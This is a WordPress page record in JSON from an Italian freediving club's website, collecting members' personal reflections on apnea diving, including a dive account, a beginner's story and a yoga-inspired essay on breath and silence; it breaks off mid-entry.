{"id":95,"date":"2013-04-13T15:58:41","date_gmt":"2013-04-13T13:58:41","guid":{"rendered":"https:\/\/www.apneamontecatini.it\/?page_id=95"},"modified":"2025-10-10T15:49:44","modified_gmt":"2025-10-10T13:49:44","slug":"il-blu","status":"publish","type":"page","link":"https:\/\/www.apneamontecatini.it\/?page_id=95","title":{"rendered":"Il Blu"},"content":{"rendered":"<p><span style=\"font-family: 'comic sans ms', sans-serif; color: #000080;\">In questa pagina abbiamo voluto raccogliere pensieri, emozioni, stati d&#8217;animo che ha suscitato in noi la pratica della disciplina dell&#8217;apnea a qualsiasi livello.<\/span><\/p>\n<p><span style=\"font-family: 'comic sans ms', sans-serif; color: #000080;\">Per questo motivo il titolo della pagina \u00e8 &#8216;Il Blu&#8217;, come il titolo del brano di apertura che \u00e8 il tuffo raccontato dal nostro Istruttore\/allenatore&#8230; Grazie a Mauro<\/span><\/p>\n<p><span style=\"font-family: 'comic sans ms', sans-serif; color: #000080;\">Proveremo a cambiare spesso le frasi che troverete in questa pagina, in modo da mostrare le sfaccettature particolari e personali della pratica apneistica.<\/span><\/p>\n<p><span style=\"font-family: 'comic sans ms', sans-serif; color: #000080;\">\u00a0<\/span><\/p>\n<p><span style=\"font-family: 'comic sans ms', sans-serif; color: #000080;\">\u00a0Ragazzi, ragazze il giorno 6 giugno 2013 il creatore di Apnea Academy ha cos\u00ec risposto alla e-mail del nostro istruttore, riguardo al nostro sito:<\/span><\/p>\n<div>\n\n<span style=\"font-family: 'comic sans ms', sans-serif; font-size: 14px; color: #ff0000;\">&lt;&lt; Sito molto carino: Faccio a \u00a0tutti i ragazzi i miei migliori auguri per crescere e divulgare sempre al meglio la nostra splendida disciplina.<\/span>\n<\/div>\n<div>\n\n<span style=\"font-family: 'comic sans ms', sans-serif; font-size: 14px; color: #ff0000;\">Buon Mare<\/span>\n<\/div>\n<div>\n\n<span style=\"font-family: 'comic sans ms', sans-serif; font-size: 14px; color: #ff0000;\">Umberto Pelizzari &gt;&gt;<\/span>\n<\/div>\n<div>\n\n\n<\/div>\n<div>\n\n\n<\/div>\n<div>\n\n<span style=\"font-family: 'comic sans ms', sans-serif; font-size: 14px; color: #000080;\">&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;<\/span>\n<\/div>\n<div>\n\n\n<\/div>\n<p style=\"padding-left: 30px;\"><span style=\"font-family: 'comic sans ms', sans-serif; color: #000080; font-size: 14px;\">CRONACA DI UN TUFFO IN APNEA<\/span><br \/><span style=\"font-family: 'comic sans ms', sans-serif; color: #000080; font-size: 14px;\"> &lt;&lt;Guardo il cavo, bianco,che scompare nel blu cobalto del mare,chiudo gli occhi cercando una pace fisica ed interiore <\/span><br \/><span style=\"font-family: 'comic sans ms', sans-serif; color: #000080; font-size: 14px;\"> che mi consenta un tuffo nel blu. La mente si placa, il cuore rallenta, i muscoli si rilassano \u2026 L&#8217; ultimo respiro \u2026<\/span><br \/><span style=\"font-family: 'comic sans ms', sans-serif; color: #000080; font-size: 14px;\"> \u2026 La capovolta, le gambe si alzano il corpo s\u2019immerge le pinne si muovono decise verso l\u2019ignoto. <\/span><br \/><span style=\"font-family: 'comic sans ms', sans-serif; color: #000080; font-size: 14px;\"> La mente cerca ogni segnale, ogni sensazione del corpo &#8230; La pinneggiata rallenta\u2026 fino a diventare una caduta libera <\/span><br \/><span style=\"font-family: 'comic sans ms', sans-serif; color: #000080; font-size: 14px;\"> verso il fondo \u2026 poi \u2026 il BLU ! \u2026 La girata ! le pinne si muovono decise per riportare <\/span><br \/><span style=\"font-family: 'comic sans ms', sans-serif; color: #000080; font-size: 14px;\"> il corpo e la mente alla vita \u2026 l\u2019aria ! La mente continua a cercare segnali, la pinneggiata rallenta fino a fermarsi, <\/span><br \/><span style=\"font-family: 'comic sans ms', sans-serif; color: #000080; font-size: 14px;\"> le pinne si incrociano come in un atto di ringraziamento al mare delle sensazioni ed emozioni provate, e <\/span><br \/><span style=\"font-family: 'comic sans ms', sans-serif; color: #000080; font-size: 14px;\"> finalmente la spinta positiva porta di nuovo il corpo e la mente alla vita. &gt;&gt; \u00a0Mauro<\/span><\/p>\n<p><span style=\"font-family: 'comic sans ms', sans-serif; font-size: 14px; color: #000080;\">&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;<\/span><\/p>\n<p><span style=\"font-family: 'comic sans ms', sans-serif; font-size: 14px; color: #000080;\">Profondit\u00e0<\/span><\/p>\n<p><span style=\"font-family: 'comic sans ms', sans-serif; font-size: 14px; color: #000080;\">&lt;&lt;La maggior parte delle persone sta sul mondo e non dentro. Oggi \u00e8 sempre pi\u00f9 difficile trovare persone che apprezzano il mondo che le circonda (un bosco, un prato fiorito, un laghetto di montagna, un fiume). Fare apnea significa calarsi totalmente nella vera essenza del mondo sommerso che, apparentemente a noi ostile, \u00e8 all\u2019origine del nostro essere.&gt;&gt; di L.M.<\/span><\/p>\n<div style=\"text-align: justify;\">\n<\/div>\n<div style=\"text-align: justify;\"><span style=\"font-family: 'comic sans ms', sans-serif; font-size: 14px; color: #000080;\">&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;<\/span>\n<\/div>\n<div style=\"text-align: justify;\">\n<div>\n\n\n<\/div>\n<div style=\"padding-left: 30px;\"><span style=\"font-family: 'comic sans ms', sans-serif; font-size: 14px; color: #000080;\">VIAGGIO IN AUTOBUS VERSO L&#8217;APNEA\u00a0<\/span>\n<\/div>\n<div style=\"padding-left: 30px;\"><span style=\"font-family: 'comic sans ms', sans-serif; font-size: 14px; color: #000080;\">&lt;&lt;In molti si chiederanno cosa c\u2019entra un autobus con l&#8217;apnea?\u00a0Effettivamente \u00e8 una strana accoppiata , ma non se a guidare questo autobus \u00e8 un amico\u00a0di nome Luca\u00a0 che facendomi ignorare per tutto il tragitto\u00a0 il divieto \u201cNon parlare al conducente \u201c!!! mi racconta di una sconosciuta di nome \u201cApnea\u201d .L&#8217;enfasi , la passione , la carica e l&#8217;amore con i quali inizia a descrivere questo mondo mi affascinano e mi incuriosiscono.Le emozioni che riesce a trasmettermi attraverso il suo racconto sono molteplici e contrastanti ; insieme a quelle belle, di pace , rilassamento e tranquillit\u00e0 arrivano quelle meno belle, fra cui l&#8217;ansia.Realizzo con grande paura che l&#8217;apnea si fa in mare aperto ! Quella paura che non conoscevo, quando da bimba, incoscientemente mi tuffavo nel profondo blu del mio bel mare di Cir\u00f2 Marina . Che tempi !\u00a0\u201cNo no no&#8230;inizio a pensare che l&#8217;apnea non fa per me!\u201d , ma Luca non molla, ha deciso di convincermi a provare!Luca=ostinazione. Le sue parole si scontrano con le mie emozioni, mi spingono a volermi mettere alla prova , testare i miei limiti ma soprattutto affrontare queste paure .Cos\u00ec decido , alla prossima si scende&#8230; Fermata Apnea !&gt;&gt; \u00a0&#8230;continua&#8230; \u00a0di G.G.\u00a0<\/span>\n<\/div>\n<p style=\"padding-left: 30px;\"><span style=\"font-family: 'comic sans ms', sans-serif; font-size: 14px; color: #000080;\">Parte 2.<\/span><\/p>\n<div style=\"padding-left: 30px;\">\n<p><span style=\"font-family: 'comic sans ms', sans-serif; font-size: 14px; color: #000080;\">Il vero viaggio ha inizio.<\/span><\/p>\n<p><span style=\"color: #000080;\"><span style=\"font-family: 'comic sans ms', sans-serif; font-size: 14px;\">\u00a0<\/span><span style=\"font-family: 'comic sans ms', sans-serif; font-size: 14px;\">&lt;&lt;Partenza verso questo nuovo mondo . Emozione , ansia e anche un certo senso di \u201cinadeguatezza \u201c accompagnano i miei primi passi . Poi la trasformazione,quelle sensazioni negative diventano uno stimolo per andare avanti e superato questo ostacolo, inizio a godermi davvero questa nuova avventura . Arrivano le prime conquiste, i 25 metri in apnea, che momento!<\/span><\/span><\/p>\n<p><span style=\"font-family: 'comic sans ms', sans-serif; font-size: 14px; color: #000080;\">Sensazioni di pace , benessere e rilassamento mi accompagnano sempre:\u00a0 prima , durante e dopo ogni \u201cTuffo\u201d . Quando entro in acqua il mio corpo si \u201cdisattiva \u201c , volendo usare un &#8216;espressione del mio istruttore Mauro. I battiti del cuore rallentano in modo automatico e naturale. Sono in pace con me stessa e con il mondo . Mi piace tutto questo , una volta che hai provato certe sensazioni non\u00a0 puoi pi\u00f9 farne a meno . Le vai a cercare e non vedi l&#8217;ora di ritrovarti ancora l\u00ec , in acqua dove non pensi n\u00e9 ai minuti n\u00e9 ai metri , dove non esiste n\u00e9 tempo n\u00e9 distanze , esisti solo tu e il tuo corpo che ti parla e ha cos\u00ec\u00a0 tante cose da dirti che nel mentre sei l\u00ec che lo ascolti ti dimentichi che hai bisogno di respirare , che sei sott&#8217;acqua. Entri in un mondo parallelo.<\/span><\/p>\n<p><span style=\"font-family: 'comic sans ms', sans-serif; font-size: 14px; color: #000080;\">Per me \u00e8 questa , al momento, la mia personale essenza dell&#8217;apnea .<\/span><\/p>\n<p><span style=\"font-family: 'comic sans ms', sans-serif; font-size: 14px; color: #000080;\">Dico \u2018al momento\u2019 perch\u00e9 tanto altro ancora ho da scoprire e tante pinneggiate da fare !&gt;&gt; \u2026continua\u2026 di G.G.<\/span><\/p>\n\n<\/div>\n<div>\n\n\n<\/div>\n<div>\n\n<span style=\"font-family: 'comic sans ms', sans-serif; font-size: 14px; color: #000080;\">&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<\/span>\n<\/div>\n<div>\n\n<span style=\"font-family: 'comic sans ms', sans-serif; font-size: 14px; color: #000080;\">UN SECONDO UN SECOLO<\/span>\n<\/div>\n<div>\n\n<span style=\"font-family: 'comic sans ms', sans-serif; color: #000080; font-size: 14px;\">&lt;&lt;Ogni volta sposto il mio limite senz&#8217;aria pi\u00f9 avanti&#8230;<\/span><br \/><span style=\"font-family: 'comic sans ms', sans-serif; color: #000080; font-size: 14px;\"> Entusiasmante, stimolante.<\/span><br \/><span style=\"font-family: 'comic sans ms', sans-serif; color: #000080; font-size: 14px;\"> L&#8217;irraggiungibile: pi\u00f9 distante \u00e8, e pi\u00f9 cerco di agguantarlo<\/span><br \/><span style=\"font-family: 'comic sans ms', sans-serif; color: #000080; font-size: 14px;\"> e pi\u00f9 scappa, si allontana&#8230;<\/span><br \/><span style=\"font-family: 'comic sans ms', sans-serif; color: #000080; font-size: 14px;\"> Poi mollo, lascio andare, ogni muscolo \u00e8 rilassato, inerte<\/span><br \/><span style=\"font-family: 'comic sans ms', sans-serif; color: #000080; font-size: 14px;\"> non faccio pi\u00f9 sforzi x raggiungere il mio limite&#8230;ed era proprio l\u00ec<\/span><br \/><span style=\"font-family: 'comic sans ms', sans-serif; color: #000080; font-size: 14px;\"> ad aspettare che mollassi, che lasciassi andare tutto!!<\/span><br \/><span style=\"font-family: 'comic sans ms', sans-serif; color: #000080; font-size: 14px;\"> Un altro piccolo attimo senza respiro, guadagnato.&gt;&gt; di C.P.<\/span>\n<\/div>\n<div>\n\n\n<\/div>\n<div>\n\n\n<\/div>\n<div>\n\n\n<p style=\"text-align: center;\"><span style=\"font-family: 'comic sans ms', sans-serif; font-size: 14px; color: #000080;\"><strong>Dopo la statica di un corsista&#8230;<\/strong><\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"font-family: 'comic sans ms', sans-serif; font-size: 14px; color: #000080;\">Volevo ringraziarvi per la lezione di stasera,come per tutte le precedenti ovviamente..ci tengo a precisare in particolar modo quella di stasera perch\u00e9 oggi ho percepito di essere entrato a far parte di questo mondo in maniera definitiva ed indissolubile&#8230;il cammino per crescere \u00e8 lungo lo so ma, percorrendolo insieme,sono certo che ci dar\u00e0 grandi soddisfazioni sia personali che di GRUPPO.Con la lezione di rilassamento e di statica di stasera ho vissuto un&#8217;esperienza personale bellissima e compreso ancor pi\u00f9 quanto sia fondamentale l&#8217;interiorit\u00e0 di ognuno di noi,di quanto sia importante allenare la mente per raggiungere quell&#8217;equilibrio alla base di questa meravigliosa disciplina.In ogni lezione o semplicemente nello spogliatoio si respira la medesima atmosfera di sempre&#8230;la voglia di fare, il piacere di stare insieme, il condividere la stessa passione e vivere il tutto con goliardia ma, allo stesso tempo,la massima seriet\u00e0.GRAZIE&#8230;sono davvero contento&#8230;per quello che finora abbiamo fatto&#8230;ma soprattutto per quello che faremo&#8230;insieme.Ci tenevo a scrivere questo mio pensiero. Non vedo l&#8217;ora sia venerd\u00ec prossimo!buon weekend. &lt;&lt;E.A.&gt;&gt;<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000080;\">&#8212;&#8212;-<\/span><\/p>\n<p style=\"text-align: left;\" align=\"center\"><span style=\"font-family: 'comic sans ms', sans-serif; color: #000080;\">Questa riflessione proviene da una Yogi e apneista&#8230; Credo meriti una attenta lettura. Meditate, meditate&#8230;<\/span><\/p>\n<p align=\"center\"><span style=\"font-family: 'comic sans ms', sans-serif; font-size: 14px; color: #000080;\"><b>Nel Profondo Blu<\/b><\/span><\/p>\n<p><span style=\"color: #000080;\"><span style=\"font-family: 'comic sans ms', sans-serif; font-size: 14px;\">\u00a0<\/span><span style=\"font-family: 'comic sans ms', sans-serif; font-size: 14px;\">Quando guardo il mare vedo la sua immensit\u00e0, vedo l\u2019opportunit\u00e0 che d\u00e0 all&#8217;uomo di entrare in questo grande blu. Inizi con il bagnarti i piedi, le gambe, le braccia fino alla testa. L\u2019acqua \u00e8 fredda e rimani un po\u2019 teso, poi rilassandoti \u00a0senti il piacere di muoverti in questa fluidit\u00e0; fino a quando, fermandoti, riesci a sentire che puoi andare avanti in questa conoscenza profonda a pi\u00f9 livelli, basta lasciarsi andare. Il mare ti avvolge in un abbraccio profondo.<\/span><\/span><\/p>\n<p><span style=\"color: #000080;\"><span style=\"font-family: 'comic sans ms', sans-serif; font-size: 14px;\">\u00a0<\/span><span style=\"font-family: 'comic sans ms', sans-serif; font-size: 14px;\">Tutto \u00e8 iniziato per caso. Un libro letto, appassionante, che racconta una grande storia d\u2019amore e di una passione verso il mare, verso l\u2019apnea. Per la prima volta leggendo un libro si \u00e8 accesa una lampadina, una curiosit\u00e0 forte che veniva da dentro, come un richiamo. Cos\u00ec mi sono informata e ho scoperto che non lontano da casa erano in programma dei corsi e ho iniziato il primo livello.<\/span><\/span><\/p>\n<p><span style=\"color: #000080; font-family: 'comic sans ms', sans-serif; font-size: 14px; line-height: 1.5;\">Credo che quella decisione sia stato il momento in cui il cambiamento ha avuto inizio. Mi concedevo di fare l\u2019allieva, mi concedevo di rimettermi in gioco.<\/span><\/p>\n<p><span style=\"font-family: 'comic sans ms', sans-serif; font-size: 14px; color: #000080;\">All&#8217;inizio ho dovuto fare i conti con il mio corpo, <i>annamayakosha<\/i>, il corpo fisico, la materia, la parte pi\u00f9 grossolana, visibile agli altri. Ho allenato per anni il mio corpo, lo controllo, lo sento, mantenendo l\u2019attenzione al respiro, parte essenziale dell\u2019esercizio fisico. Ho potuto sperimentare l\u2019involucro di <i>pranamayakosha<\/i>, l\u2019energia vitale, sento il collegamento tra corpo, respiro ed energia. Avviene ogni volta che faccio un esercizio, che corro.<\/span><\/p>\n<p><span style=\"font-family: 'comic sans ms', sans-serif; font-size: 14px; color: #000080;\">Ma quel primo giorno dell\u2019inizio del corso c\u2019era qualcosa di diverso, di imprevisto: l\u2019acqua.<\/span><\/p>\n<p><span style=\"font-family: 'comic sans ms', sans-serif; font-size: 14px; color: #000080;\">Un ambiente nuovo, nuovi adattamenti, gestire uno spazio ed il corpo in modo diverso, mi sentivo in difficolt\u00e0. Ho scoperto all&#8217;improvviso di essere scoordinata, proprio imbranata, molto rigida e di non riuscire a lasciarmi andare in questa esperienza. Mi veniva chiesto di fare un gesto e non riuscivo, mancava la coordinazione tra la mia mente e il corpo.<\/span><\/p>\n<p><span style=\"font-family: 'comic sans ms', sans-serif; font-size: 14px; color: #000080;\">La prima domanda \u00e8 stata: perch\u00e9? Cosa avevo tralasciato? Come mi sentivo a fare i soliti esercizi? Cosa tutto questo mi dava?&#8230; Era solo un esercizio, controllato, fatto bene, con la giusta intensit\u00e0 e respiro. Era tutto quasi perfetto, ma non c\u2019erano emozioni, sensazioni, sentimenti, mancava il viaggio all&#8217;interno, mancavano gli altri strati di conoscenza: <i>manomayakosha<\/i>, <i>vijnana<\/i><i>mayakosha<\/i>, <i>anandamayakosha<\/i>.<\/span><\/p>\n<p><span style=\"font-family: 'comic sans ms', sans-serif; font-size: 14px; color: #000080;\">Ho capito che il mio corpo aveva precisi \u00a0schemi motori, facevo sempre le stesse cose, gli stessi gesti; dovevo destrutturare, uscire dalle mie abitudini, apprendere nuovi automatismi e prenderne consapevolezza.<\/span><\/p>\n<p><span style=\"font-family: 'comic sans ms', sans-serif; font-size: 14px; color: #000080;\">Mi trovavo all&#8217;inizio di un percorso \u00a0che, nonostante le difficolt\u00e0, sentivo essere giusto per me. Mi stavo risvegliando.<\/span><\/p>\n<p><span style=\"color: #000080;\"><span style=\"font-family: 'comic sans ms', sans-serif; font-size: 14px; line-height: 1.5;\">Contemporaneamente Dianella ha iniziato il corso di introduzione alla meditazione. Lo scopo era quello di attraversare i <\/span><i style=\"font-family: 'comic sans ms', sans-serif; font-size: 14px; line-height: 1.5;\">kosha<\/i><span style=\"font-family: 'comic sans ms', sans-serif; font-size: 14px; line-height: 1.5;\"> in un viaggio verso l\u2019interno\u2026<\/span><\/span><\/p>\n<p><span style=\"font-family: 'comic sans ms', sans-serif; font-size: 14px; color: #000080;\">Che bella coincidenza! Dianella \u00e8 stata molto brava, con la sua pazienza ci ha presi per mano, passo \u00a0passo, con piccoli scioglimenti di ghiandole e giunture per migliorare la posizione seduta affinch\u00e9 diventasse confortevole, con il rilassamento \u201ctensione e rilassamento\u201d, semplice e molto profondo che mi ha permesso una graduale presa di coscienza, ad ogni respiro ogni parte del mio corpo eseguiva l\u2019istruzione che la mia mente gli stava dando in quel momento.<\/span><\/p>\n<p><span style=\"font-family: 'comic sans ms', sans-serif; font-size: 14px; color: #000080;\">Il mio corpo non c\u2019era pi\u00f9, solo la mente, rilassata, centrata, c\u2019era quiete. Questo rilassamento coordina gli emisferi celebrali e prepara alla meditazione. A me \u00e8 servito per instaurare un nuovo collegamento tra la mia mente e il mio corpo.\u00a0<\/span><\/p>\n<p><span style=\"color: #000080; font-family: 'comic sans ms', sans-serif; font-size: 14px; line-height: 1.5;\">Adesso ero pronta per l\u2019uscita in mare: muta, boccaglio, pinne, maschera, pronti per entrare in acqua. Ma\u2026 ho dovuto ricominciare tutto da capo: non c\u2019erano pi\u00f9 i bordi della piscina, mille varianti e soprattutto non c\u2019erano limiti anzi, una immensit\u00e0 dove muoversi.<\/span><\/p>\n<p><span style=\"font-family: 'comic sans ms', sans-serif; font-size: 14px; color: #000080;\">Mi sono irrigidita di nuovo. Di nuovo mi sono trovata nell&#8217;incapacit\u00e0 di unire, coordinare mente e corpo. Volevo, ma in realt\u00e0 realizzavo un&#8217;altra cosa. Questa volta per\u00f2 avevo gi\u00e0 fatto questa esperienza e continuando con il rilassamento e piccole meditazioni, ho potuto realizzare quella consapevolezza per scendere a testa in gi\u00f9, lungo il cavo, anche solo per pochi metri. Ricordo quel momento in cui pinneggiando scendevo guardando il cavo, nitido davanti ai miei occhi, che mi stava guidando alla scoperta di me stessa. Ho cominciato a chiedermi \u201cchi \u00e8 quella Letizia che scende nel mare? Chi sono realmente?\u201d<\/span><\/p>\n<p><span style=\"font-family: 'comic sans ms', sans-serif; font-size: 14px; color: #000080;\">Ogni volta succedeva qualcosa, c\u2019era un cambiamento dentro di me che si manifestava con una luce negli occhi, ero diversa ogni volta che uscivo dall&#8217;acqua. Qui \u00e8 iniziata la scoperta di me.<\/span><\/p>\n<p><span style=\"color: #000080; font-family: 'comic sans ms', sans-serif; font-size: 14px; line-height: 1.5;\">C\u2019erano altri strati da esplorare e soprattutto i miei pensieri. Casualmente ho trovato un articolo di Swami Veda Bharati sulla purificazione mentale. E\u2019 stato il passo successivo, \u00e8 stato il collegamento tra due mondi apparentemente diversi ma uniti da qualcosa di magico. Un tuffo dentro il nostro io, il nostro s\u00e9 con un obbiettivo unico, migliorarsi, crescere, conoscersi e stare con tutto questo nella vita quotidiana.<\/span><\/p>\n<p><span style=\"font-family: 'comic sans ms', sans-serif; font-size: 14px; color: #000080;\">Swami Veda scrive:\u201d Pensate all&#8217;oceano. Siete sulla spiaggia e osservate l\u2019oceano. Onde potenti, tempestose, onde che sollevano le imbarcazioni, su e gi\u00f9. L\u2019idea che ognuno di noi ha dell\u2019oceano \u00e8 di onde e suoni di tempesta. Ma Jacques Cousteau \u00a0scrisse qualcosa a proposito del medesimo oceano e intitol\u00f2 il suo libro \u201cIl mondo del silenzio\u201d <i>[n.d.a. (Le monde du silence) \u00e8 un <a title=\"Film\" href=\"https:\/\/it.wikipedia.org\/wiki\/Film\" style=\"color: #000080;\">film<\/a> <a title=\"Documentario\" href=\"https:\/\/it.wikipedia.org\/wiki\/Documentario\" style=\"color: #000080;\">documentario<\/a> del <a title=\"1956\" href=\"https:\/\/it.wikipedia.org\/wiki\/1956\" style=\"color: #000080;\">1956<\/a> diretto da <a title=\"Jacques-Yves Cousteau\" href=\"https:\/\/it.wikipedia.org\/wiki\/Jacques-Yves_Cousteau\" style=\"color: #000080;\">Jacques-Yves Cousteau<\/a> e <a title=\"Louis Malle\" href=\"https:\/\/it.wikipedia.org\/wiki\/Louis_Malle\" style=\"color: #000080;\">Louis Malle<\/a><\/i><i>.]<\/i> Uno dei miei hobby era l\u2019immersione subacquea. Se un sub desidera immergersi e fare esperienza di questo mondo silenzioso, come si deve comportare? Star\u00e0 sulla barca a dire:\u201dcaspita che tempesta, che onde potenti! Come posso fermarle?\u201d Ma non c\u2019\u00e8 alcun modo per fermarle. Cos\u00ec indossa l\u2019attrezzatura e si tuffa in mare. Sotto la superficie del mare non ci sono onde. E\u2019 un mondo silenzioso. Provate a scendere nelle profondit\u00e0 di un paradiso tropicale e poi sollevate lo sguardo. Vedrete la barca e le persone che si scuotono e si agitano e si aggrappano ai bordi della barca, preoccupate e timorose di cadere nella stessa acqua di cui voi state facendo un\u2018esperienza cos\u00ec piacevole. E allora immergetevi profondamente nel mare. Quando? Ora. Dove? Dentro. Per quanto? Per l\u2019eterno.<\/span><\/p>\n<p><span style=\"font-family: 'comic sans ms', sans-serif; font-size: 14px; color: #000080;\">Potete immergervi profondamente nel mare ora, internamente, ovunque siate. Non potete fermare le onde di superficie. Ma solo una piccola parte della mente \u00e8 coinvolta con queste onde. E c\u2019\u00e8 una vasta profondit\u00e0 nella mente che \u00e8 connessa all\u2019infinito. Non combattete i pensieri che emergono. Tornate continuamente a fare ci\u00f2 che dovete. Tutto ci\u00f2 di cui un sub ha bisogno \u00e8 la sua attrezzatura di respirazione. Focalizzatevi sul vostro respiro. Osservatelo. Continuate a sentirlo. Mantenete una singola parola nella mente e tornate di continuo ad essa. Tornatevi di continuo, di continuo. E imparerete a tuffarvi oltre\u00a0 quell\u2019 area dell\u2019oceano della mente piena di onde tempestose. Stiamo parlando quindi della scienza della personalit\u00e0 umana, di tutte le facolt\u00e0 della personalit\u00e0 umana per come sono state esplorate, assieme alle mappe della coscienza tracciate da coloro che compirono l\u2019esplorazione interiore. E\u2019 una grande avventura. Pi\u00f9 grande di tutte le avventure nello spazio esterno \u00e8 l\u2019avventura nello spazio interiore\u2026. La mente controlla il corpo.\u201d<\/span><\/p>\n<p><span style=\"color: #000080;\"><span style=\"font-family: 'comic sans ms', sans-serif; font-size: 14px; line-height: 1.5;\">Nella nostra Tradizione Himalayana non \u00e8 contemplato il <\/span><i style=\"font-family: 'comic sans ms', sans-serif; font-size: 14px; line-height: 1.5;\">kumbhaka<\/i><span style=\"font-family: 'comic sans ms', sans-serif; font-size: 14px; line-height: 1.5;\">, se non come pratica avanzata, solo quando il maestro ritiene che l\u2019allievo sia pronto. Per me l\u2019importante \u00e8 stato fare tutto questo con rispetto, prima di tutto verso me stessa, accettando i miei limiti, e fortunatamente i miei istruttori non hanno preteso mai niente, se non che imparassi a giocare con l\u2019acqua, a sorridere, a scherzare.<\/span><\/span><\/p>\n<p><span style=\"font-family: 'comic sans ms', sans-serif; font-size: 14px; color: #000080;\">Le mie piccole meditazioni sono continuate e anche le discese in mare. Una sera mi sono immersa al tramonto, senza allontanarmi dagli scogli: \u00e8 un\u2019attivit\u00e0 che adesso faccio spesso insieme ad altri apneisti per il piacere di vivere il mare in un momento del giorno insolito. Una luce, la mia torcia, che illumina una piccola parte del vasto mare, sufficiente per scendere senza pericoli.<\/span><\/p>\n<p><span style=\"font-family: 'comic sans ms', sans-serif; font-size: 14px; color: #000080;\">Durante la prima discesa mi sono concessa di rimanere in apnea qualche secondo in pi\u00f9, e non dovendomi concentrare sulla posizione corretta di discesa, la mia mente ha scoperto un nuovo rumore: il Silenzio. Ho sentito il niente, non avevo nessun pensiero che disturbava. La mia mente completamente libera. E\u2019 stato ed \u00e8 lo stesso silenzio che a volte ho percepito durante la meditazione. Non avrei mai pensato che il mare potesse farmi questo regalo prezioso. Mi sono innamorata di quel silenzio e della sensazione che rimane dentro di me di pace, di gioia \u00a0e di vitalit\u00e0.<\/span><\/p>\n<p><span style=\"color: #000080;\"><span style=\"font-family: 'comic sans ms', sans-serif; font-size: 14px; line-height: 1.5;\">Il mondo dell\u2019apnea non \u00e8 soltanto questo. C\u2019\u00e8 la fase di allenamento fuori dall\u2019acqua, dove vengono usate tecniche di rilassamento e respirazione specifiche prese dal <\/span><i style=\"font-family: 'comic sans ms', sans-serif; font-size: 14px; line-height: 1.5;\">pranayama<\/i><span style=\"font-family: 'comic sans ms', sans-serif; font-size: 14px; line-height: 1.5;\">. C\u2019\u00e8 un training mentale per avere gli strumenti necessari per stare comodi in questo sport, che per me \u00e8 stata la meditazione. Professionisti che con la loro esperienza e una grande passione ti aiutano in questo cammino.<\/span><\/span><\/p>\n<p><span style=\"color: #000080; font-family: 'comic sans ms', sans-serif; font-size: 14px; line-height: 1.5;\">Pensando, mi mancava ancora qualcosa, dopo tanto movimento sperimentare l\u2019immobilit\u00e0 in acqua. Avevo fatto occasionalmente apnea statica e dopo questo percorso il rilassarsi in acqua poteva essere un occasione per andare avanti nella conoscenza di me stessa. Un istruttore e psicologo di Apnea Academy, definisce l\u2019apnea statica come \u201cun grande tuffo dentro di s\u00e9 e pertanto si ha bisogno di strumenti per stare in quel luogo, in quel silenzio, in quel vuoto. Si parte dall\u2019ascolto del corpo, al flusso dei pensieri, dal suono del corpo, alla fusione con l\u2019acqua.\u201d Rilassamento, visualizzazioni, dialogo interiore, meditazione, suono interiore, ma in particolare questa frase: \u201cil respiro \u00e8 il luogo della comprensione\u201d. Respirare bene prima dell\u2019apnea \u00e8 importante, faccio l\u2019ultimo profondo respiro e mi lascio andare nell\u2019acqua che mi accoglie, mi sostiene. Trattengo il respiro e da quel momento sento il mio corpo solo dall\u2019interno, lo rilasso dalla testa ai piedi e dai piedi alla testa. L\u2019acqua mi accarezza e mi culla. Sto bene, sono rilassata e posso godere ancora un po\u2019 di tempo questa sensazione. Ho bisogno di uno strumento per concentrarmi, non perdermi nei pensieri, e durante la meditazione uso il mantra, lo ripeto nella mente con calma; gentilmente mi guida nell&#8217;ascolto del silenzio fino a quando ritorno a respirare fuori dall\u2019acqua e mi ascolto: sono rilassata e sto bene. Ho vissuto un momento di immobilit\u00e0 fisica e mentale e per pochi minuti mi sono sentita l\u00ec: presente. \u00a0La percezione dello spazio e del tempo si modificano. Un attimo dove l\u2019esperienza \u00e8 intensa e per questo sembra breve, infinitamente breve.<\/span><\/p>\n<p><span style=\"font-family: 'comic sans ms', sans-serif; font-size: 14px; color: #000080;\">\u00a0\u00a0\u00a0\u00a0\u00a0 \u00a0Sono passata dal vedere e accogliere i miei pensieri \u00a0a toccare le emozioni, al sentire. Il corpo rappresenta ci\u00f2 che siamo, cos\u00ec come le nostre emozioni sono nel nostro cuore e di conseguenza nel corpo. Sono tornata a lavorare sul respiro ancora pi\u00f9 consapevole di questo strumento di unione tra l\u2019esterno e l\u2019interno, lasciare fluire questa energia vitale liberamente. Posso dire che l\u2019apnea \u00e8 stato un mezzo per comprendere tutto questo.<\/span><\/p>\n<p><span style=\"color: #000080; font-family: 'comic sans ms', sans-serif; font-size: 14px; line-height: 1.5;\">Mi ero persa e lungo quel cavo mi sono ritrovata, in quel momento ne ho preso consapevolezza, i miei occhi\u00a0 visualizzavano l\u2019obiettivo: conoscere se stessi, sperimentando quel silenzio. Focalizzare lo sguardo verso un punto,gi\u00f9 nel profondo, per scendere verso l\u2019immensit\u00e0 del mare e quando \u00e8 il momento di risalire, godersi ogni istante. Alzo lo sguardo per vedere la luce dei raggi del sole che penetrano nell\u2019acqua\u2026 un cerchio dove gli altri aspettano.<\/span><\/p>\n<p><span style=\"font-family: 'comic sans ms', sans-serif; font-size: 14px; color: #000080;\">C\u2019\u00e8 ancora qualche secondo. Mi sento libera, mi sento presente nel vivere un\u2019esperienza veramente unica. Ogni volta lascio in fondo al mare qualcosa che ormai non fa pi\u00f9 parte di me, ogni volta risalgo pi\u00f9 leggera, pi\u00f9 vera. Consapevole, regalo agli altri questa magia, questa gioia infinita.<\/span><\/p>\n<p><span style=\"color: #000080; font-family: 'comic sans ms', sans-serif; font-size: 14px; line-height: 1.5;\">Mi sono concessa tutto questo e penso che sia soltanto un inizio, \u00e8 la mia strada e non posso fare finta di niente, finalmente ho avuto il coraggio di tuffarmi nel profondo blu. &lt;&lt; L.P.&gt;&gt;<\/span><\/p>\n<p><span style=\"font-family: 'comic sans ms', sans-serif; font-size: 14px; color: #000080;\">_____<\/span><\/p>\n<p><span style=\"font-family: 'comic sans ms', sans-serif; font-size: 14px; color: #000080;\">Dopo Y-40&#8230;<\/span><\/p>\n<p><span style=\"font-family: 'comic sans ms', sans-serif; font-size: 14px; 